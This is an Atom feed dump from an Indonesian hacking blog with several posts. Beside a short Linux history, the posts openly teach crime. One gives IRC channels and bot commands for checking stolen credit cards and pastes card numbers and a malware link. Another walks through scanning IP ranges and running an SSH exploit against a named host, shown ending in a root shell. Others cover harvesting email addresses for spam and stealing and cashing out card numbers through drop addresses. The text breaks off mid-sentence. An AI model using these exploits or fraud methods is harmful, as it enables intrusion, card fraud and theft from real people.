type='application/atom+xml' href='http://carahacking.blogspot.com/feeds/979055047014962727/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1331045226915696546&amp;postID=979055047014962727' title='4 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1331045226915696546/posts/default/979055047014962727'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1331045226915696546/posts/default/979055047014962727'/><link rel='alternate' type='text/html' href='http://carahacking.blogspot.com/2007/03/cara-cepat-bongkar-password.html' title='Cara Cepat Bongkar Password'/><author><name>Sri Maryati Pratiwi</name><uri>http://www.blogger.com/profile/08229341449358449348</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>4</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1331045226915696546.post-1988448337930205822</id><published>2007-03-31T04:29:00.002+07:00</published><updated>2007-03-31T04:30:19.126+07:00</updated><title type='text'>LINUX</title><content type='html'>Unix yang seluruh source codenya dibuat dengan bahasa C sangat  memudahkan&lt;br /&gt; pengembanganya sehingga dalam waktu singkat Unix  dapat  berkembang secara &lt;br /&gt; pesat, dan terbentuklah dua aliran : yaitu Unix   yang  dikembangkan  oleh &lt;br /&gt; Universitas Berkeley dan yang dikembangkan AT&amp;T.&lt;br /&gt;&lt;br /&gt; Semakin lama semakin banyak perusahaan yang ikut melibatkan diri, sehingga &lt;br /&gt; terjadilah persaingan antar perusahaan   untuk memegang  kontrol  terhadap&lt;br /&gt; sistem operasi.PErsaingan ini menyebabkan perlunya sebuah standar yang baku&lt;br /&gt; sehingga lahirlah proyek bernama 'POSIX' yang di  motori  oleh   IEEE (The &lt;br /&gt; Institute of Electrical and Electronics Engineers)  yang  akan  menetapkan&lt;br /&gt; spesifikasi standar Unix. ternyata, dengan adanya standar  tersebut  tetap&lt;br /&gt; belum bisa meredakan persaingan yang timbul  yang  mengakibatkan munculnya &lt;br /&gt; berbagai varian dari Unix.&lt;br /&gt;&lt;br /&gt; Source code  Minix yang tercipta sebagai salah satu varian Unix dan dibuat &lt;br /&gt; oleh Andy S Tanembaum untuk tujuan pendidikan inilah yang dijadikan  Linus&lt;br /&gt; Torvalds sebagai referensi untuk membuat suatu Opeating system  yang dapat &lt;br /&gt; bekerja seperti Unix dalam komputer  386.  Dalam  pembuatan  linux , Linus &lt;br /&gt; memakai tool-tool dari Free Software Foundation yang berlicensi GNU.  Agar&lt;br /&gt; sistem operasi yang baru dibuatnya utuh , linus juga menambahkan program-&lt;br /&gt; program yang berlicensi GNU. Linux yang dibuat linus sebagai hobi akhirnya &lt;br /&gt; membuahkan versi pertama linux, yaitu linux versi 0.0.1, setelah mengalami &lt;br /&gt; perbaikan pada versi 0.02 dan merupakan linux resmi pertama yang diumumkan&lt;br /&gt; secara luas kepada publik. pada tanggal 5 Oktober 1991 linus  menggumumkan &lt;br /&gt; source codenya.&lt;br /&gt; &lt;br /&gt; Linux yang pertama dirilis sudahdapat menjalankan shell bash,GNU C compiler&lt;br /&gt; , GNU make, GNU Sed, Compress dll. Proyek linux ini menyita begitu banyak&lt;br /&gt; perhatian seluruh programer di dunia yang akhirnya  berpartisipasi  untuk&lt;br /&gt; ikut mengembangkan linux.&lt;br /&gt; &lt;br /&gt; 'Linux' bisa jadi merupakan proyek  para  hacker  yang sangat berharga di &lt;br /&gt; dalam sejarah - serta didistribusikan secara bebas beserta kode sumbernya &lt;br /&gt; keseluruh dunia.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1331045226915696546-1988448337930205822?l=carahacking.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://carahacking.blogspot.com/feeds/1988448337930205822/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1331045226915696546&amp;postID=1988448337930205822' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1331045226915696546/posts/default/1988448337930205822'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1331045226915696546/posts/default/1988448337930205822'/><link rel='alternate' type='text/html' href='http://carahacking.blogspot.com/2007/03/linux.html' title='LINUX'/><author><name>Sri Maryati Pratiwi</name><uri>http://www.blogger.com/profile/08229341449358449348</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1331045226915696546.post-1608399090041551248</id><published>2007-03-31T04:29:00.001+07:00</published><updated>2007-03-31T04:29:34.410+07:00</updated><title type='text'>Senjata Seorang Carder</title><content type='html'>Tentu kalian udah nggak asing lagi dengan istilah yang satu ini,carder adalah istilah yang diberikan oleh hacker sejati untuk pencuri kartu kredit. Kali ini kita akan bahas soal carder ini.&lt;br /&gt;&lt;br /&gt;Tapi ingat!!! yang aku tulis ini,hanya bersifat ilmu pengetahuan.aku tidak bertanggung jawab jika kalian berurusan dengan pihak kepolisian. Aku sarankan jika kalian mendapat cc jangan beli barang.&lt;br /&gt;&lt;br /&gt;Mari kita mulai......&lt;br /&gt;&lt;br /&gt;1.masuk ke MIRC &lt;br /&gt;dari MIRC kalian join ke channel ini :&lt;br /&gt;&lt;br /&gt;#CCPOSTS&lt;br /&gt;#THACC (Dulu namanya #thecc)&lt;br /&gt;&lt;br /&gt;sebenarnya masih banyak channel yang lainnya tapi aku kasih dua aja yaa!!&lt;br /&gt;&lt;br /&gt;2.setelah join ke #ccpost kamu ketik perintah !commands dan kemudian akan muncul di layar perintah perintah yang bisa kamu gunakan.&lt;br /&gt;&lt;br /&gt;3.!chk cc number valid /!chk 1234567890 1202 untuk mengetahui kartu tsb bisa di gunakan atau tidak.&lt;br /&gt;&lt;br /&gt;4.!cvv2 cc number/ !cvv2 1234567890 untuk mengetahui nomor identitas kartu tsb (card ID)&lt;br /&gt;&lt;br /&gt;5.!proxy&lt;br /&gt;untuk mengetahui nomor proxy dan port yang bisa kamu gunakan untuk mengelabui ISP.&lt;br /&gt;&lt;br /&gt;6.!order.log&lt;br /&gt;untuk mengetahui nama,alamat dan cc number seseorang.&lt;br /&gt;&lt;br /&gt;ini nih cuplikannya : &lt;br /&gt;&lt;br /&gt;#ccposts&lt;br /&gt;&lt;br /&gt;*** Now talking in #ccposts&lt;br /&gt;&lt;br /&gt;*** Topic is '..:: Welcome To #CCPOSTS | !Chk [OFF] !Commands [ON] !Cvv2 [ON] | Also Idle In #Dont.whois.me.bitch and get Aop | +o/+v Verify First| /server xdirc.d2g.com -&gt; Free BNC: /server portatech.net 21500 xdirc'&lt;br /&gt;&lt;br /&gt;*** Set by ^XDIrc^ on Thu May 09 02:04:28&lt;br /&gt;-CCard-Chk-Bot- Tired Of Using Dallnet FFoor Checking CC's ? Try X-Niatites 5.01 -- http://mi5.ausgamers.com/xns501.exe (Win ME untested &amp; 24 Valid CC's Included) !cvv2 5437000105070603 !commands&lt;br /&gt;&lt;br /&gt;*** Quits: MIHUTESCU (~mihut@80.97.26.67) (Client closed connection) Er0sake` , &lt; 5437000105070603 &gt; is Master &gt; cvv2 : -&gt; 074 &lt;-, by : SL[a]TkiS , #DaCc&lt;br /&gt;-listen2rap- SL[a]TkiS's command llist iiss as following: !country Country-Name, !state State-Name, !bank cc-Number, !bnc, !order.log, !cardable, !proxy, !unicode, !cvv2 ccNumber - -=. SL[a]TkiS addon version 4.0, get it at www.sthost4u.net/Programs/slatkis_addon_4.0.zip , #DaCc =- &lt;@^Enhance^&gt; ?? Request ?? Info?Auth.net Merchant Account - I have Virgins / Cvv2 / eBay Seller Accounts / Proxy / XXX / Cardable Sites / High Limit CCs -- I Ver. First. NewBs &amp; Ripperz Piss Off? ? ?׿? ?&lt;br /&gt;&lt;br /&gt;*** Joins: ^tyty^ (BaCk0ff@max227.idx.com.au)&lt;br /&gt;&lt;br /&gt;*** Quits: ^tyty^ (BaCk0ff@max227.idx.com.au) (Quit: )&lt;br /&gt;&lt;br /&gt;* DaLinuX i have root i need cc msg me for trade&lt;br /&gt;!chk 373216942923005 0802&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;#thacc&lt;br /&gt;*** Now talking in #thacc&lt;br /&gt;*** Topic is 'We are not responsible for any actions that non-op's perform or any actions against DALnet policy that may done at the main chan}}[Type: !commands ] ||GSD's site: www.TheCC.biz || [ Join #CCpower ] [new command by GSD &gt; !phone &lt; only when MR^all' is here] y2y = GSD'&lt;br /&gt;*** Set by GSD on Fri May 03 02:11:11&lt;br /&gt;!proxy&lt;br /&gt;*** Parts: fc4 (~umik_o@203.147.50.12)&lt;br /&gt;*** Joins: fc4 (~umik_o@203.147.50.12)&lt;br /&gt;&lt;^Enhance^&gt; ?? Request ?? Info?Auth.net Merchant Account - I have Virgins / Cvv2 / eBay Seller Accounts / Proxy / XXX / Cardable Sites / High Limit CCs -- I Ver. First. NewBs &amp; Ripperz Piss Off? ? ?׿? ?&lt;br /&gt;*** Quits: ALICE22 (kozxgy@189.Red-80-34-233.pooles.rima-tde.net) (Quit: IRcap 7.1 http://www.ircap.net !)&lt;br /&gt;*** Quits: ^tyty^ (BaCk0ff@max227.idx.com.au) (Quit: ) !xlogin 373216942923005 0802&lt;br /&gt;*** e_KiNGHT-[Away] is now known as Guest53360&lt;br /&gt;How I can see my card is valid&lt;br /&gt;* DaLinuX i have root i need cc msg me for trade&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Jelas ??!&lt;br /&gt;Sekedar saran aja, pakai alamat rumah kontrakan/kost, jadi setelah barang yang didapat sampai, segera kabur dari rumah tersebut, hheeeehe, biar gak dilacak&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1331045226915696546-1608399090041551248?l=carahacking.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://carahacking.blogspot.com/feeds/1608399090041551248/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1331045226915696546&amp;postID=1608399090041551248' title='9 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1331045226915696546/posts/default/1608399090041551248'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1331045226915696546/posts/default/1608399090041551248'/><link rel='alternate' type='text/html' href='http://carahacking.blogspot.com/2007/03/senjata-seorang-carder.html' title='Senjata Seorang Carder'/><author><name>Sri Maryati Pratiwi</name><uri>http://www.blogger.com/profile/08229341449358449348</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>9</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1331045226915696546.post-6998456708494010312</id><published>2007-03-31T04:27:00.001+07:00</published><updated>2007-03-31T04:28:51.533+07:00</updated><title type='text'>Root Attack</title><content type='html'>lebih lanjut...&lt;br /&gt;1. download scanning http://xvak-1.150m.com/tool/grabbb-0.1.0.tar.gz &lt;br /&gt;2. tar -zxvf grabbb-0.1.0.tar.gz dan make , maka akan kmu dapati file grabbb. &lt;br /&gt;3. cara penggunaan grabbb : &lt;br /&gt;a. ketik ./grabbb maka akan ada help nya &lt;br /&gt;b. klo saya biasanya ./grabbb -a xxx.xxx.xxx.0 -b xxx.xxx.xxx.255 port &lt;== port disini &lt;br /&gt;terserah kmu mau berapa, bisa 21, 22, 23, 443, 80, 8080 &lt;br /&gt;- klo kita scan port 21 maka akan keliatan versi wuftpd &lt;br /&gt;- klo kita scan port 22 maka akan keliatan versi ssh &lt;br /&gt;- klo kita scan port 443 maka akan keliatan versi openssl &lt;br /&gt;&lt;br /&gt;berikut contoh ssh: &lt;br /&gt;66.1.198.210:22: SSH-1.99-OpenSSH_2.5.2p2 &lt;br /&gt;66.1.205.138:22: SSH-1.99-OpenSSH_2.9p2 &lt;br /&gt;66.1.213.59:22: SSH-1.5-1.2.27 &lt;br /&gt;66.1.214.123:22: SSH-1.99-OpenSSH_2.9p2 &lt;br /&gt;66.1.217.77:22: SSH-1.5-1.2.25 &lt;br /&gt;&lt;br /&gt;setelah kita tau ssh yang dipake, tinggal menjalankan exploitnya &lt;br /&gt;&lt;br /&gt;4. download x2, x3, x4 dst tergantung kmu mau pake yang mana, pake semua juga bisa &lt;br /&gt;sebagai contoh pemakaian saya pake x3.tar.gz &lt;br /&gt;5. ./x3 -t 0 &lt;br /&gt;SSHD deattack exploit. By Dvorak with Code from teso (http://www.team-teso.net) &lt;br /&gt;Targets: &lt;br /&gt;( 1) Small - SSH-1.5-1.2.26 &lt;br /&gt;( 2) Small - SSH-1.5-OpenSSH-1.2.3 &lt;br /&gt;( 3) Small - SSH-1.5-1.2.31 &lt;br /&gt;( 4) Small - SSH-1.5-1.3.07 &lt;br /&gt;( 5) Small - SSH-1.99-OpenSSH_2.1.1 &lt;br /&gt;( 6) Small - SSH-1.5-1.3.6_F-SECURE_SSH &lt;br /&gt;( 7) Small - SSH-1.5-1.2.27 &lt;br /&gt;( 8) Small - SSH-1.99-OpenSSH_2.2.0p1 &lt;br /&gt;( 9) Big - SSH-1.99-OpenSSH_2.2.0p1 &lt;br /&gt;(10) Big - SSH-1.5-1.2.27 &lt;br /&gt;(11) Small - SSH-1.99-OpenSSH_2.2.0p1 -TEST &lt;br /&gt;(12) Big - SSH-1.5-1.2.27 &lt;br /&gt;&lt;br /&gt;6. klo kita liat hasil dari grabbb, maka kita mendapat satu ip yaitu &lt;br /&gt;66.1.213.59:22: SSH-1.5-1.2.27 &lt;br /&gt;&lt;br /&gt;7. kita coba ./x3 -t 7 66.1.213.59 22 . &lt;br /&gt;SSHD deattack exploit. By Dvorak with Code from teso (http://www.team-teso.net) &lt;br /&gt;&lt;br /&gt;Target: Small - SSH-1.99-OpenSSH_2.2.0p1 &lt;br /&gt;&lt;br /&gt;Attacking: 66.1.213.59:22 &lt;br /&gt;Testing if remote sshd is vulnerable # ATTACH NOW &lt;br /&gt;&lt;br /&gt;YES # &lt;br /&gt;Finding h - buf distance (estimate) &lt;br /&gt;(1 ) testing 0x00000004 # SEGV # &lt;br /&gt;(2 ) testing 0x0000c804 # FOUND # &lt;br /&gt;Found buffer, determining exact diff &lt;br /&gt;Finding h - buf distance using the teso method &lt;br /&gt;(3 ) binary-search: h: 0x083fb7fc, slider: 0x00008000 # SEGV # &lt;br /&gt;(4 ) binary-search: h: 0x083f77fc, slider: 0x00004000 # SURVIVED &lt;br /&gt;(5 ) binary-search: h: 0x083f97fc, slider: 0x00002000 # SURVIVED # &lt;br /&gt;(6 ) binary-search: h: 0x083fa7fc, slider: 0x00001000 # SURVIVED # &lt;br /&gt;(7 ) binary-search: h: 0x083faffc, slider: 0x00000800 # SEGV # &lt;br /&gt;(8 ) binary-search: h: 0x083fabfc, slider: 0x00000400 # SURVIVED # &lt;br /&gt;(9 ) binary-search: h: 0x083fadfc, slider: 0x00000200 # SEGV # &lt;br /&gt;(10) binary-search: h: 0x083facfc, slider: 0x00000100 # SEGV # &lt;br /&gt;(11) binary-search: h: 0x083fac7c, slider: 0x00000080 # SURVIVED # &lt;br /&gt;(12) binary-search: h: 0x083facbc, slider: 0x00000040 # SURVIVED # &lt;br /&gt;(13) binary-search: h: 0x083facdc, slider: 0x00000020 # SURVIVED # &lt;br /&gt;Bin search done, testing result &lt;br /&gt;Finding exact h - buf distance &lt;br /&gt;(16) trying: 0x083facdc # SURVIVED # &lt;br /&gt;Exact match found at: 0x00005324 &lt;br /&gt;Looking for exact buffer address &lt;br /&gt;Finding exact buffer address &lt;br /&gt;(17) Trying: 0x080c5324 # SEGV # &lt;br /&gt;(18) Trying: 0x080c6324 # SEGV # &lt;br /&gt;(19) Trying: 0x080c7324 # SEGV # &lt;br /&gt;(20) Trying: 0x080c8324 # SEGV # &lt;br /&gt;(21) Trying: 0x0810e324 # SURVIVED # &lt;br /&gt;(22 Trying: 0x08088634 # OK # &lt;br /&gt;Finding distance till stack buffer &lt;br /&gt;&lt;br /&gt;Crash, finding next return address &lt;br /&gt;EX: buf: 0x0807420c h: 0x0806f000 ret-dist: 0xb7f8ba02 &lt;br /&gt;ATTACH NOW &lt;br /&gt;Changing MSW of return address to: 0x0807 &lt;br /&gt;Crash, finding next return address &lt;br /&gt;EX: buf: 0x0807420c h: 0x0806f000 ret-dist: 0xb7f8ba02 &lt;br /&gt;ATTACH NOW &lt;br /&gt;Changing MSW of return address to: 0x0807 &lt;br /&gt;Crash, finding next return address &lt;br /&gt;EX: buf: 0x0807420c h: 0x0806f000 ret-dist: 0xb7f8ba02 &lt;br /&gt;ATTACH NOW &lt;br /&gt;Changing MSW of return address to: 0x0807 &lt;br /&gt;Crash, finding next return address &lt;br /&gt;EX: buf: 0x0807420c h: 0x0806f000 ret-dist: 0xb7f8ba02 &lt;br /&gt;ATTACH NOW &lt;br /&gt;Changing MSW of return address to: 0x0807 &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;********* YOU ARE IN ********* &lt;br /&gt;&lt;br /&gt;uname -a ; id &lt;br /&gt;uname -a ; id &lt;br /&gt;Linux chander.com.tw 2.4.18-3 #1 Thu Apr 18 07:31:07 EDT 2002 i586 unknown &lt;br /&gt;uid=48(root) gid=48(root) groups=48(root) &lt;br /&gt;&lt;br /&gt;nah itu uah dapat, terserah mau diapakan &lt;br /&gt;&lt;br /&gt;keterangan: &lt;br /&gt;ngeroot menggunakan exploit ini sangatlah memakan waktu, saya menyarankan utk memakai scan massal, bisa memakai massplo.tar.gz atau massrooter.tar.gz sama saja. &lt;br /&gt;&lt;br /&gt;tapi yang terpenting disini kita tau bagaimana cara mencari dia memakai ssh versi berapa, wuftp versi berapa, dan yang lain-lain&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1331045226915696546-6998456708494010312?l=carahacking.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://carahacking.blogspot.com/feeds/6998456708494010312/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1331045226915696546&amp;postID=6998456708494010312' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1331045226915696546/posts/default/6998456708494010312'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1331045226915696546/posts/default/6998456708494010312'/><link rel='alternate' type='text/html' href='http://carahacking.blogspot.com/2007/03/root-attack.html' title='Root Attack'/><author><name>Sri Maryati Pratiwi</name><uri>http://www.blogger.com/profile/08229341449358449348</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1331045226915696546.post-4832348966854054089</id><published>2007-03-31T04:24:00.003+07:00</published><updated>2007-03-31T04:25:43.077+07:00</updated><title type='text'>Cara Mendapatkan Puluhan Ribu Email</title><content type='html'>A. Gunakan software Mailcrawl (notworksolution.com) Versi gratisnya bisa menyimpan 3.000 email sekali pencarian, bisa diakali sampai bisa menyimpan 15.000 email/keyword.&lt;br /&gt;&lt;br /&gt;Cara menggunakan :&lt;br /&gt;1. Pada quick start wizard click using target searching kemudian masukkan keyword khas Indonesia &lt;br /&gt;(keluarga, uang, wanita, sukses, pertanian, militer) &lt;br /&gt;2. Option :&lt;br /&gt;a. thread pilih 60-80&lt;br /&gt;b. email parsing: klik only extract email with these extension/domain lalu isi .com .net .id c. pada ignore email with these username isi dengan daftar kata di bawah : (copy saja)&lt;br /&gt;abuse info consult notice privacy support spam nospam sales bugtraq listserv subscribe unsubscribe &lt;br /&gt;majordomo reply bounce mail nama domain daemon www news xxx 20 3d file main webadmin webmaster &lt;br /&gt;admin owner promaster postmaster hostmaster manajerhosting tuanweb webhosting daftar register billing &lt;br /&gt;customercare customerservice cs feedback komentar manager namaanda name username yourname &lt;br /&gt;support technical service cs prohosting zzz info support technical request join berhenti&lt;br /&gt;anggota menu index help file artikel d. automatic saving pilih angka 1.000 e. Start --- beri nama folder tempat penyimpanan hasil sesuai dengan nama keyword f. Jika angka email valid belum mencapai 1,000 sedangkan panel pencarian telah mendekati batas akhir,&lt;br /&gt;lakukan stop kemudian tambahkan keyword baru tanpa harus mereset lagi. Sebaiknya nama folder &lt;br /&gt;penyimpanan gabungan keyword&lt;br /&gt;g. Jika angka email valid telah mendekati angka 3.000 sementara panel pencarian masih jauh dari batas &lt;br /&gt;akhir. Lakukan stop lalu start kemudian beri nama baru folder hasil pencarian, sebaiknya keyword1,&lt;br /&gt;keyword2 dst. &lt;br /&gt;&lt;br /&gt;3. Jika telah dilakukan pengumpulan dengan banyak keyword, pasti ada email ganda. &lt;br /&gt;Untuk mendapatkan daftar email tunggal gunakan software Listawy (mewsoft.com). Sofware ini selain bisa &lt;br /&gt;merge, removal email juga mensplit seluruh email menurut jumlah file atau jumlah email/per file&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1331045226915696546-4832348966854054089?l=carahacking.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://carahacking.blogspot.com/feeds/4832348966854054089/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1331045226915696546&amp;postID=4832348966854054089' title='13 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1331045226915696546/posts/default/4832348966854054089'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1331045226915696546/posts/default/4832348966854054089'/><link rel='alternate' type='text/html' href='http://carahacking.blogspot.com/2007/03/cara-mendapatkan-puluhan-ribu-email.html' title='Cara Mendapatkan Puluhan Ribu Email'/><author><name>Sri Maryati Pratiwi</name><uri>http://www.blogger.com/profile/08229341449358449348</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>13</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1331045226915696546.post-3778991595670889604</id><published>2007-03-31T04:24:00.001+07:00</published><updated>2007-03-31T04:24:44.603+07:00</updated><title type='text'>Cara Carding</title><content type='html'>Semenjak dipopulerkannya sistem kartu kredit sekitar tahun 70-an dulu,&lt;br /&gt;semakin banyak orang yang menggunakan sistem pembayaran kartu kredit sebab&lt;br /&gt;kartu kredit dianggap lebih praktis untuk dibawa-bawa dan lebih mudah&lt;br /&gt;sebab sistem pembayarannya adalah online. Di Amerika, Kanada dan&lt;br /&gt;negara-negara Eropa, kartu kredit adalah hal yang sangat lumrah digunakan,&lt;br /&gt;bahkan oleh para pelajar SMA sekalipun. Di Indonesia, biar bagaimanapun,&lt;br /&gt;kartu kredit masih dipandang sebagai simbol status. Dulu saya ingat di&lt;br /&gt;waktu saya masih SMA di Lampung ada teman yang punya kartu kredit dan tiap&lt;br /&gt;hari diporotin oleh anak-anak. Beberapa tahun belakangan, dengan makin&lt;br /&gt;ramainya 'online business' di Indonesia, semakin meluaslah pemakaian kartu&lt;br /&gt;kredit sebagai sistem pembayaran, terutama di kota-kota metropolitan&lt;br /&gt;seperti Jakarta, Medan dan Surabaya.&lt;br /&gt;&lt;br /&gt;Bagaimana kartu kredit bisa jatuh ke tangan orang lain.&lt;br /&gt;=======================================================&lt;br /&gt;&lt;br /&gt;Pada prinsipnya, sang kartu sendiri (plastik) sangat jarang didapatkan.&lt;br /&gt;Hal ini sebab orang beranggapan, jika kartu kreditnya disimpan di lemari&lt;br /&gt;dan hanya dikeluarkan pada saat ingin digunakan, maka akan sangat susah&lt;br /&gt;untuk menyalah gunakan kartu tsb. Ini adalah kesalahan yang cukup besar.&lt;br /&gt;Pada pokoknya, jika kamu ingin melakukan kejahatan penyalahgunaan kartu&lt;br /&gt;kredit, yang diperlukan adalah *nomor* kartu tersebut, beserta nama&lt;br /&gt;pemiliknya (banyak juga bisnis yang meminta tanggal kadaluwarsa, namun di&lt;br /&gt;Internet, biasanya kamu bisa lolos menggunakan nomor dan nama saja,&lt;br /&gt;asalkan tanggal kadaluwarsa diisi (dikarang-karang) paling tidak enam&lt;br /&gt;bulan didepan).&lt;br /&gt;Bagaimana caranya memperoleh nomor-nomor kartu kredit ini ??? Di&lt;br /&gt;negara-negara dimana kartu kredit digunakan secara meluas, untuk&lt;br /&gt;mendapatkan nomor kartu kredit, biasanya tidak memerlukan ketrampilan&lt;br /&gt;khusus. Kamu bisa iseng ngaduk-ngaduk tempat sampah toko grosir atau bisa&lt;br /&gt;coba kerja di pom bensin, dan mendapatkan bon kartu kredit pelanggan. Di&lt;br /&gt;Indonesia, hal ini semakin mungkin dilakukan, terutama di pasar-pasar&lt;br /&gt;swalayan besar seperti Sogo, segitiga Senen, M Plaza, dll. Biasanya bon&lt;br /&gt;penerimaan berupa kertas berwarna yang mencantumkan nama, nomor kartu&lt;br /&gt;kredit, berapa total harga, dan seterusnya. Jika kamu seorang perempuan,&lt;br /&gt;itu lebih bagus lagi. Cari kerjaan sebagai kasir dan sempatkan diri untuk&lt;br /&gt;menyalin nomor-nomor tersebut. Perempuan juga jarang dicurigai ;-).&lt;br /&gt;Mengaduk-ngaduk tempat sampah juga bisa berguna, sebab selain bisa&lt;br /&gt;mendapatkan salinan bon, jika kamu ngaduk-ngaduk tempat sampah di dekat&lt;br /&gt;bangunan ISP, kamu juga bisa mendapatkan password/login, dll (lihat&lt;br /&gt;artikel 'Trashing dan Social Engineering').&lt;br /&gt;Metode mutakhir yang sekarang banyak digunakan di negara-negara maju&lt;br /&gt;adalah dengan cara menggunakan perangkat 'surveillance' untuk mendapatkan&lt;br /&gt;nomor kartu kredit calon korban. Tentu saja jika kamu berhasil&lt;br /&gt;mendapatkan akses ke database milik ISP atau Web komersil, kamu bisa&lt;br /&gt;memanen ratusan bahkan ribuan nomor kartu kredit dari situ.&lt;br /&gt;&lt;br /&gt;Sudah dapat kartunya, lalu?&lt;br /&gt;===========================&lt;br /&gt;&lt;br /&gt;Umumnya, para kriminil tingkat kecil-kecilan yang berhasil mendapat nomor&lt;br /&gt;kartu kredit milik orang lain menggunakannya untuk kebutuhan pribadi. Hal&lt;br /&gt;ini masih agak sulit dilakukan di Indonesia sebab masih jarang bisnis&lt;br /&gt;komersil yang bersedia menerima pembayaran kartu kredit tanpa mengecek&lt;br /&gt;detailnya. Di Kanada sini, cara yang banyak dipraktekkan adalah sbb:&lt;br /&gt;&lt;br /&gt;- temukan rumah kosong / yang lagi ditinggalkan penghuninya untuk jangka&lt;br /&gt;  waktu yang lama&lt;br /&gt;- buka katalog-katalog barang-barang menarik yang diinginkan&lt;br /&gt;- telepon sang penjual, bayar dengan kartu kredit tsb (perlu tgl&lt;br /&gt;  kadaluwarsa, dan biasanya alamat sang empunya kartu).&lt;br /&gt;- minta diantarkan ke alamat rumah kosong tadi (atau, lebih bagus lagi,&lt;br /&gt;  kamar hotel), dan minta 'express delivery' (hari berikutnya)&lt;br /&gt;  karang alasan seperti: perlu mendadak untuk presentasi lusa, atau&lt;br /&gt;  tetek bengek lainnya. gunakan social engineering.&lt;br /&gt;- tunggu kedatangan barangnya.&lt;br /&gt;- ambil barangnya, dan ... CABUT!&lt;br /&gt;&lt;br /&gt;Dengan cara ini kadang-kadang para kriminil (umumnya anak ABG) bisa&lt;br /&gt;mendapatkan laptop Tilamook terbaru bernilai $5000. Sang pemilik kartu&lt;br /&gt;sendiri pada saat mengetahui bahwa kartunya telah disalah gunakan tidak&lt;br /&gt;akan dikenakan biaya apa-apa, selain mungkin administrasi pengurusan&lt;br /&gt;kasus, yang nilainya tidak sampai $50.&lt;br /&gt;Dengan makin maraknya servis internet, semakin banyak pula kriminil yang&lt;br /&gt;men(yalah)gunakan kartu kredit curian untuk mendapatkan servis gratis.&lt;br /&gt;Karena komputer itu bodoh, kamu bisa dengan gampangnya mengaku sebagai&lt;br /&gt;pemilik yang sah. Biasanya dengan mengisi 'form' di webpage, kamu bisa&lt;br /&gt;registrasi untuk layanan tsb (kalau tidak salah d-net sudah punya&lt;br /&gt;fasilitas ini, melalui diffy.com-nya, tapi kurang pasti) atau bisa untuk&lt;br /&gt;mengorder sesuatu. Di Indonesia, yang paling sering digunakan oleh para&lt;br /&gt;kriminil jenis baru ini (yang, umumnya adalah cowok ABG) adalah, apalagi&lt;br /&gt;kalau bukan, registrasi 'member' untuk klub-klub porno di Internet.&lt;br /&gt;&lt;br /&gt;Beberapa anggapan&lt;br /&gt;=================&lt;br /&gt;&lt;br /&gt;1. Tidak mungkin saya bisa dilacak, toh, ini Internet, dan tak ada yang&lt;br /&gt;melihat.&lt;br /&gt;Hampir benar. Mungkin jika kamu hanya menggunakannya untuk pemalsuan&lt;br /&gt;kelas teri, akan dibiarkan saja berlalu. Dalam pemalsuan kelas kakap, pun,&lt;br /&gt;kamu masih bisa lolos tanpa dilacak. Tapi dengan syarat kamu benar-benar&lt;br /&gt;hati-hati. Gunakan line telepon yang bukan milikmu, gunakan account&lt;br /&gt;internet bukan milikmu, dari web gunakan Anonymizer, dll dll (seperti&lt;br /&gt;layaknya cracking/intruding). Namun resiko kamu terlacak jelas ada, bahkan&lt;br /&gt;di Indonesia sekalipun. Setiap transaksi di Internet merekam nomor IP&lt;br /&gt;kamu, walaupun browser kamu tidak diset 'secure'. Anonymizer tidak&lt;br /&gt;bersedia melayani protokol https:// 